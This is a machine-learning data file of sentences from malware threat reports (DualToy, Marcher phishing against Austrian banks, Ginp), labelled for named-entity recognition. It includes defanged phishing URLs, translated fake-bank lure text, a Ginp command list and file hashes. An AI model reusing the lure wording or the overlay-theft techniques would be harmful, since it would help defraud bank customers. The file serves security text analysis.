{"text": "This disallows apps to be installed on your device from unknown sources .", "spans": {}, "info": {"id": "cyner_train_002663", "source": "cyner_train"}}
{"text": "We would also like to mention that if you come across an app hiding it 's icon , always try to search for the app in your device settings ( by going to Settings - > Apps - > Search for icon that was hidden ) .", "spans": {}, "info": {"id": "cyner_train_002664", "source": "cyner_train"}}
{"text": "In the case of this spyware , search for app named TikTok Pro .", "spans": {"SYSTEM: TikTok Pro": [[51, 61]]}, "info": {"id": "cyner_train_002665", "source": "cyner_train"}}
{"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]]}, "info": {"id": "cyner_train_002666", "source": "cyner_train"}}
{"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices .", "spans": {"SYSTEM: Microsoft Windows": [[102, 119]], "SYSTEM: Apple iOS": [[124, 133]]}, "info": {"id": "cyner_train_002667", "source": "cyner_train"}}
{"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day .", "spans": {}, "info": {"id": "cyner_train_002668", "source": "cyner_train"}}
{"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors .", "spans": {}, "info": {"id": "cyner_train_002669", "source": "cyner_train"}}
{"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices .", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android": [[80, 87]]}, "info": {"id": "cyner_train_002671", "source": "cyner_train"}}
{"text": "However , within six months the malicious actors added the capability to infect iOS devices .", "spans": {"SYSTEM: iOS": [[80, 83]]}, "info": {"id": "cyner_train_002672", "source": "cyner_train"}}
{"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland .", "spans": {}, "info": {"id": "cyner_train_002674", "source": "cyner_train"}}
{"text": "Credential phishing and an Android banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks .", "spans": {"SYSTEM: Android": [[27, 34]]}, "info": {"id": "cyner_train_002675", "source": "cyner_train"}}
{"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks .", "spans": {"ORGANIZATION: Proofpoint": [[10, 20]], "MALWARE: Marcher": [[157, 164]]}, "info": {"id": "cyner_train_002676", "source": "cyner_train"}}
{"text": "Attacks involving Marcher have become increasingly sophisticated , with documented cases involving multiple attack vectors and a variety of targeted financial services and communication platforms [ 1 ] [ 2 ] .", "spans": {"MALWARE: Marcher": [[18, 25]]}, "info": {"id": "cyner_train_002677", "source": "cyner_train"}}
{"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 .", "spans": {}, "info": {"id": "cyner_train_002678", "source": "cyner_train"}}
{"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself .", "spans": {"MALWARE: Marcher": [[136, 143]]}, "info": {"id": "cyner_train_002679", "source": "cyner_train"}}
{"text": "Analysis Marcher is frequently distributed via SMS , but in this case , victims are presented with a link in an email .", "spans": {"MALWARE: Marcher": [[9, 16]]}, "info": {"id": "cyner_train_002680", "source": "cyner_train"}}
{"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade detection .", "spans": {}, "info": {"id": "cyner_train_002681", "source": "cyner_train"}}
{"text": "Figure 1 : Landing page for phishing scheme asking for the victim ’ s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign .", "spans": {"SYSTEM: Bank Austria": [[122, 134]]}, "info": {"id": "cyner_train_002684", "source": "cyner_train"}}
{"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ .", "spans": {}, "info": {"id": "cyner_train_002685", "source": "cyner_train"}}
{"text": "] info including the “ bankaustria ” brand .", "spans": {}, "info": {"id": "cyner_train_002686", "source": "cyner_train"}}
{"text": "Figure 2 : Bit.ly statistics for a phishing landing page targeting Bank Austria customers The actor appears to have recently begun using “ .top ” top-level domains ( TLDs ) for their phishing landing pages and have implemented a consistent naming structure as shown below .", "spans": {"SYSTEM: Bank Austria": [[67, 79]]}, "info": {"id": "cyner_train_002687", "source": "cyner_train"}}
{"text": "Earlier this year , the actor used “ .pw ” TLDs while the Bank Austria scheme highlighted above used “ .info ” .", "spans": {"SYSTEM: Bank Austria": [[58, 70]]}, "info": {"id": "cyner_train_002688", "source": "cyner_train"}}
{"text": "Some recent campaigns against other bank customers also used “ .gdn ” TLDs .", "spans": {}, "info": {"id": "cyner_train_002689", "source": "cyner_train"}}
{"text": "Other attacks on Bank Austria customers that we observed resolved to the following .top domains : Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817062 [ .", "spans": {"SYSTEM: Bank Austria": [[17, 29]]}, "info": {"id": "cyner_train_002690", "source": "cyner_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817461 [ .", "spans": {}, "info": {"id": "cyner_train_002691", "source": "cyner_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ .", "spans": {}, "info": {"id": "cyner_train_002692", "source": "cyner_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ .", "spans": {}, "info": {"id": "cyner_train_002694", "source": "cyner_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ .", "spans": {}, "info": {"id": "cyner_train_002695", "source": "cyner_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ .", "spans": {}, "info": {"id": "cyner_train_002696", "source": "cyner_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ .", "spans": {}, "info": {"id": "cyner_train_002697", "source": "cyner_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ .", "spans": {}, "info": {"id": "cyner_train_002699", "source": "cyner_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ .", "spans": {}, "info": {"id": "cyner_train_002700", "source": "cyner_train"}}
{"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors .", "spans": {}, "info": {"id": "cyner_train_002701", "source": "cyner_train"}}
{"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank .", "spans": {}, "info": {"id": "cyner_train_002702", "source": "cyner_train"}}
{"text": "Figure 3 : Step two of the credential phish asking for the victim ’ s email address and phone number Having stolen the victim ’ s account and personal information , the scammer introduces a social engineering scheme , informing users that they currently do not have the “ Bank Austria Security App ” installed on their smartphone and must download it to proceed .", "spans": {"SYSTEM: Bank Austria Security App": [[272, 297]]}, "info": {"id": "cyner_train_002704", "source": "cyner_train"}}
{"text": "Figure 4 shows the download prompt for this fake app ; an English translation follows .", "spans": {}, "info": {"id": "cyner_train_002705", "source": "cyner_train"}}
{"text": "Figure 4 : Alert prompting the victim to download an Android banking app ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Dear Customer , The system has detected that the Bank Austria Security App is not installed on your smartphone .", "spans": {"SYSTEM: Android banking app": [[53, 72]], "SYSTEM: Bank Austria Security App": [[219, 244]]}, "info": {"id": "cyner_train_002706", "source": "cyner_train"}}
{"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system .", "spans": {"ORGANIZATION: EU": [[11, 13]], "SYSTEM: Bank Austria security app": [[52, 77]]}, "info": {"id": "cyner_train_002707", "source": "cyner_train"}}
{"text": "Please install the app immediately to avoid blocking your account .", "spans": {}, "info": {"id": "cyner_train_002708", "source": "cyner_train"}}
{"text": "Follow the instructions at the bottom of this page .", "spans": {}, "info": {"id": "cyner_train_002709", "source": "cyner_train"}}
{"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted .", "spans": {"SYSTEM: Bank Austria Security App": [[17, 42]]}, "info": {"id": "cyner_train_002710", "source": "cyner_train"}}
{"text": "Our security app allows us to transmit this sensitive data encrypted to you , thus increasing the security that you will not suffer any financial loss .", "spans": {}, "info": {"id": "cyner_train_002711", "source": "cyner_train"}}
{"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device .", "spans": {"SYSTEM: Bank Austria Security App": [[18, 43]]}, "info": {"id": "cyner_train_002712", "source": "cyner_train"}}
{"text": "* * * End translation * * * The phishing template then presents additional instructions for installing the fake security application ( Figure 5 ) : Figure 5 : Additional instructions telling the victim to give the app the requested permissions ( English translation below ) , with stolen branding and fraudulent copy * * * Translation * * * Step 2 : Allow installation Open your device 's settings , select Security or Applications ( depending on the device ) , and check Unknown sources .", "spans": {}, "info": {"id": "cyner_train_002714", "source": "cyner_train"}}
{"text": "After successful installation , tap Open and enable the device administrator .", "spans": {}, "info": {"id": "cyner_train_002716", "source": "cyner_train"}}
{"text": "* * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) .", "spans": {}, "info": {"id": "cyner_train_002718", "source": "cyner_train"}}
{"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named “ BankAustria.apk ” , continuing the fraudulent use of the bank ’ s branding to fool potential victims .", "spans": {"SYSTEM: Bank Austria Android app": [[42, 66]], "MALWARE: Marcher banking Trojan": [[215, 237]]}, "info": {"id": "cyner_train_002719", "source": "cyner_train"}}
{"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] .", "spans": {"MALWARE: Marcher": [[58, 65]]}, "info": {"id": "cyner_train_002720", "source": "cyner_train"}}
{"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15", "spans": {}, "info": {"id": "cyner_train_002721", "source": "cyner_train"}}
{"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware .", "spans": {}, "info": {"id": "cyner_train_002722", "source": "cyner_train"}}
{"text": "Allows an application to read from external storage .", "spans": {}, "info": {"id": "cyner_train_002724", "source": "cyner_train"}}
{"text": "Allows an application to use SIP service .", "spans": {}, "info": {"id": "cyner_train_002725", "source": "cyner_train"}}
{"text": "Allows an application to send SMS messages .", "spans": {}, "info": {"id": "cyner_train_002728", "source": "cyner_train"}}
{"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call .", "spans": {}, "info": {"id": "cyner_train_002731", "source": "cyner_train"}}
{"text": "Allows applications to access information about networks .", "spans": {}, "info": {"id": "cyner_train_002732", "source": "cyner_train"}}
{"text": "Allows an application to read the user 's contacts data .", "spans": {}, "info": {"id": "cyner_train_002734", "source": "cyner_train"}}
{"text": "Allows an application to read or write the system settings .", "spans": {}, "info": {"id": "cyner_train_002735", "source": "cyner_train"}}
{"text": "Allows applications to change Wi-Fi connectivity state .", "spans": {}, "info": {"id": "cyner_train_002737", "source": "cyner_train"}}
{"text": "Allows applications to change network connectivity state .", "spans": {}, "info": {"id": "cyner_train_002738", "source": "cyner_train"}}
{"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app .", "spans": {"MALWARE: Marcher": [[132, 139], [167, 174]]}, "info": {"id": "cyner_train_002739", "source": "cyner_train"}}
{"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission screen for the app Once installed the app will place a legitimate looking icon on the phone ’ s home screen , again using branding stolen from the bank .", "spans": {}, "info": {"id": "cyner_train_002740", "source": "cyner_train"}}
{"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store .", "spans": {"SYSTEM: Fake Bank Austria Security application": [[12, 50]], "SYSTEM: Google Play": [[293, 304]]}, "info": {"id": "cyner_train_002741", "source": "cyner_train"}}
{"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) .", "spans": {}, "info": {"id": "cyner_train_002742", "source": "cyner_train"}}
{"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above .", "spans": {"SYSTEM: Bank Austria": [[131, 143]]}, "info": {"id": "cyner_train_002744", "source": "cyner_train"}}
{"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments .", "spans": {}, "info": {"id": "cyner_train_002745", "source": "cyner_train"}}
{"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites .", "spans": {}, "info": {"id": "cyner_train_002747", "source": "cyner_train"}}
{"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware .", "spans": {}, "info": {"id": "cyner_train_002748", "source": "cyner_train"}}
{"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) .", "spans": {}, "info": {"id": "cyner_train_002751", "source": "cyner_train"}}
{"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks .", "spans": {}, "info": {"id": "cyner_train_002753", "source": "cyner_train"}}
{"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server .", "spans": {"MALWARE: Ginp": [[15, 19]]}, "info": {"id": "cyner_train_002757", "source": "cyner_train"}}
{"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features .", "spans": {}, "info": {"id": "cyner_train_002758", "source": "cyner_train"}}
{"text": "This and following versions were masquerading as fake “ Adobe Flash Player ” apps .", "spans": {"SYSTEM: Adobe Flash Player": [[56, 74]]}, "info": {"id": "cyner_train_002759", "source": "cyner_train"}}
{"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation .", "spans": {}, "info": {"id": "cyner_train_002762", "source": "cyner_train"}}
{"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately .", "spans": {}, "info": {"id": "cyner_train_002763", "source": "cyner_train"}}
{"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber .", "spans": {"SYSTEM: Snapchat": [[68, 76]], "SYSTEM: Viber": [[81, 86]]}, "info": {"id": "cyner_train_002764", "source": "cyner_train"}}
{"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) .", "spans": {"MALWARE: Anubis": [[106, 112]]}, "info": {"id": "cyner_train_002765", "source": "cyner_train"}}
{"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version .", "spans": {}, "info": {"id": "cyner_train_002771", "source": "cyner_train"}}
{"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration .", "spans": {}, "info": {"id": "cyner_train_002773", "source": "cyner_train"}}
{"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user .", "spans": {}, "info": {"id": "cyner_train_002774", "source": "cyner_train"}}
{"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim .", "spans": {"MALWARE: Ginp": [[115, 119], [211, 215]]}, "info": {"id": "cyner_train_002775", "source": "cyner_train"}}
{"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks .", "spans": {}, "info": {"id": "cyner_train_002776", "source": "cyner_train"}}
{"text": "The commands supported by the most recent version of the bot are listed below .", "spans": {}, "info": {"id": "cyner_train_002777", "source": "cyner_train"}}
{"text": "As can be observed , the possibilities offered by the bot are pretty common .", "spans": {}, "info": {"id": "cyner_train_002778", "source": "cyner_train"}}
{"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling", "spans": {}, "info": {"id": "cyner_train_002779", "source": "cyner_train"}}
{"text": "the accessibility service ENABLE_HIDDEN_SMS Set malware as default SMS app DISABLE_HIDDEN_SMS Remove malware as default SMS app ENABLE_EXTENDED_INJECT Enable overlay attacks DISABLE_EXTENDED_INJECT Disable overlay attacks ENABLE_CC_GRABBER Enable the Google Play overlay DISABLE_CC_GRABBER Disable the Google Play overlay START_DEBUG Enable debugging GET_LOGCAT Get logs from the device STOP_DEBUG Disable debugging GET_APPS", "spans": {"SYSTEM: Google Play": [[251, 262], [302, 313]]}, "info": {"id": "cyner_train_002780", "source": "cyner_train"}}
{"text": "Get installed applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , such as the use of overlay attacks , SMS control and contact", "spans": {"SYSTEM: Android": [[428, 435]]}, "info": {"id": "cyner_train_002781", "source": "cyner_train"}}
{"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates .", "spans": {}, "info": {"id": "cyner_train_002783", "source": "cyner_train"}}
{"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future .", "spans": {"MALWARE: Anubis": [[47, 53]], "SYSTEM: Anubis": [[123, 129]]}, "info": {"id": "cyner_train_002784", "source": "cyner_train"}}
{"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update", "spans": {"MALWARE: Ginp": [[0, 4]]}, "info": {"id": "cyner_train_002785", "source": "cyner_train"}}
{"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan .", "spans": {"MALWARE: Ginp": [[52, 56]]}, "info": {"id": "cyner_train_002786", "source": "cyner_train"}}
{"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code .", "spans": {"MALWARE: Anubis": [[75, 81]]}, "info": {"id": "cyner_train_002787", "source": "cyner_train"}}
{"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device .", "spans": {}, "info": {"id": "cyner_train_002788", "source": "cyner_train"}}
{"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground .", "spans": {}, "info": {"id": "cyner_train_002789", "source": "cyner_train"}}
{"text": "If the package name of the foreground app is included in the target list , an overlay is shown .", "spans": {}, "info": {"id": "cyner_train_002790", "source": "cyner_train"}}
{"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot .", "spans": {}, "info": {"id": "cyner_train_002791", "source": "cyner_train"}}
{"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim ’ s login credentials , then stealing the credit card details ( to “ validate ” the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks .", "spans": {"MALWARE: Ginp": [[21, 25]]}, "info": {"id": "cyner_train_002792", "source": "cyner_train"}}
{"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app .", "spans": {"SYSTEM: Google Play Store": [[87, 104]]}, "info": {"id": "cyner_train_002794", "source": "cyner_train"}}
{"text": "More apps could be added to the grabber target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets .", "spans": {"SYSTEM: Facebook": [[124, 132]], "SYSTEM: WhatsApp": [[133, 141]], "SYSTEM: Skype": [[142, 147]], "SYSTEM: Twitter": [[148, 155]], "SYSTEM: Chrome": [[156, 162]], "SYSTEM: Instagram": [[163, 172]], "SYSTEM: Snapchat": [[173, 181]], "SYSTEM: Viber": [[182, 187]], "MALWARE: Ginp": [[261, 265]]}, "info": {"id": "cyner_train_002795", "source": "cyner_train"}}
{"text": "When analyzing the Ginp ’ s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan .", "spans": {"MALWARE: Ginp": [[19, 23]], "SYSTEM: ThreatFabric": [[45, 57]]}, "info": {"id": "cyner_train_002797", "source": "cyner_train"}}
{"text": "Based on the evolution of Ginp it is clear that it isn ’ t based on Anubis , but rather reuses some of its code .", "spans": {"MALWARE: Ginp": [[26, 30]], "MALWARE: Anubis": [[68, 74]]}, "info": {"id": "cyner_train_002798", "source": "cyner_train"}}
{"text": "Below are some of the elements showing the relation .", "spans": {}, "info": {"id": "cyner_train_002799", "source": "cyner_train"}}
{"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Anubis": [[94, 100], [295, 301]], "SYSTEM: Anubis": [[216, 222]]}, "info": {"id": "cyner_train_002800", "source": "cyner_train"}}
{"text": "Previous versions were storing config values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information .", "spans": {"SYSTEM: Anubis": [[186, 192]], "MALWARE: Ginp": [[262, 266]]}, "info": {"id": "cyner_train_002801", "source": "cyner_train"}}
{"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities .", "spans": {}, "info": {"id": "cyner_train_002802", "source": "cyner_train"}}
{"text": "Ginp ’ s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank .", "spans": {"MALWARE: Ginp": [[0, 4]]}, "info": {"id": "cyner_train_002803", "source": "cyner_train"}}
{"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language .", "spans": {}, "info": {"id": "cyner_train_002804", "source": "cyner_train"}}
{"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution .", "spans": {}, "info": {"id": "cyner_train_002805", "source": "cyner_train"}}
{"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions .", "spans": {}, "info": {"id": "cyner_train_002806", "source": "cyner_train"}}
{"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during", "spans": {"MALWARE: Ginp": [[36, 40]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335]]}, "info": {"id": "cyner_train_002807", "source": "cyner_train"}}
{"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c", "spans": {"SYSTEM: Adobe Flash Player": [[65, 83], [171, 189]]}, "info": {"id": "cyner_train_002808", "source": "cyner_train"}}
{"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below .", "spans": {"SYSTEM: Adobe Flash Player": [[0, 18]], "MALWARE: Ginp": [[170, 174]]}, "info": {"id": "cyner_train_002809", "source": "cyner_train"}}
{"text": "This list is expected to grow in the future .", "spans": {}, "info": {"id": "cyner_train_002810", "source": "cyner_train"}}
{"text": "We believe the TelePort Crew Threat Actor is operating out of Russia or Eastern Europe with the groups major motivations appearing to be financial in nature through cybercrime and/or corporate espionage.", "spans": {"THREAT_ACTOR: TelePort Crew Threat Actor": [[15, 41]], "THREAT_ACTOR: groups": [[96, 102]], "ORGANIZATION: financial": [[137, 146]], "THREAT_ACTOR: cybercrime": [[165, 175]], "THREAT_ACTOR: corporate espionage.": [[183, 203]]}, "info": {"id": "cyner2_train_000000", "source": "cyner2_train"}}
{"text": "The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: the OilRig campaign": [[17, 36]], "MALWARE: malicious Microsoft Excel documents": [[86, 121]], "ORGANIZATION: victims.": [[136, 144]]}, "info": {"id": "cyner2_train_000001", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.WebToos.A6 Trojan.Gadoopt.Win64.4 Trojan/Gadoopt.aa Win64.Backdoor.Gadoopt.b TROJ_WEBTOOS_EL150244.UVPM Win.Trojan.Win64-93 BackDoor.Gates.19 TROJ_WEBTOOS_EL150244.UVPM TR/Gadoopt.maz Trojan:Win32/WebToos.A Win64/Gadoopt.AA Trojan.Win32.WebToos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000003", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodc4c.Trojan.f31e Win32.Packed.VMProtect.a Trojan.Win32.Zapchast.ajbs Trojan.Win32.Black.elkboj Trojan.Win32.Z.Vmprotbad.242576[h] W32/Trojan.TYMW-2040 Trojan/Win32.PcClient.R191990 Trojan.VMProtect! Trojan.Win32.VMProtect Trj/CI.A Win32/Trojan.f26", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000005", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9952 PWS:MSIL/Bahmajip.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000007", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Radminer!O TrojanDropper.Small.PQ4 Worm.Radminer.Win32.8 Trojan/Radmin.b TROJ_SPNR.03EF12 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.XJGC-7764 Remacc.Radmin TROJ_SPNR.03EF12 Dos.Trojan.RAdmin-17 Trojan-Dropper.RadmIns Worm.Win32.Radminer.d Trojan.Win32.Radminer.dxpafi Worm.Win32.A.Radminer.307200 Trojan.DownLoader9.15517 BehavesLike.Win32.Skintrim.fh W32/Trojan2.OCDS Trojan[RemoteAdmin]/Win32.RAdmin Backdoor:Win32/Radmin.B Worm.Win32.Radminer.d Trojan/Win32.RAdmin.R103271 Trj/CI.A Trojan.Radmin.B Win32/Radmin.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000009", "source": "cyner2_train"}}
